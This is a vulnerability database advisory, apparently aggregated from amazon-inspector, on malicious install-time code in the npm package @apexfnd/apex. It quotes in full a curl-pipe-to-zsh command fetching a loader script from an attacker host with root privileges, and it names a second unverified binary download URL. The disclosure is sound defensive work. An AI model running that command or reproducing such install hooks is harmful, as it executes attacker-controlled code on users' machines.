VDB
EN

MAL-2026-11121

Malicious code in @apexfnd/apex (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1) The npm package @apexfnd/apex ships a postinstall script (install.cjs) that performs two install-time remote-code-execution actions. On macOS it writes an AppleScript to /tmp and invokes osascript to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` with administrator privileges, prompting the user for their password and executing the returned shell script as root. On all platforms it also unconditionally downloads a platform-specific binary from `https://github.com/Apex-Foundation/copilot/releases/download/v1.0.0/apex-<target>`, writes it to the package's bin path, and chmods it 0755, without any hash or signature verification. The package's declared publisher metadata (homepage omp.sh, repository can1357/oh-my-pi) does not match either destination (update.apex-arena-router.com, github.com/Apex-Foundation/copilot); the fetched content is attacker-controlled bytes executed on the installer's machine at install time, with root privileges on macOS.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / @apexfnd/apex

No fixed version published yet for @apexfnd/apex (npm). Pin to a known-safe version or switch to an alternative.

참고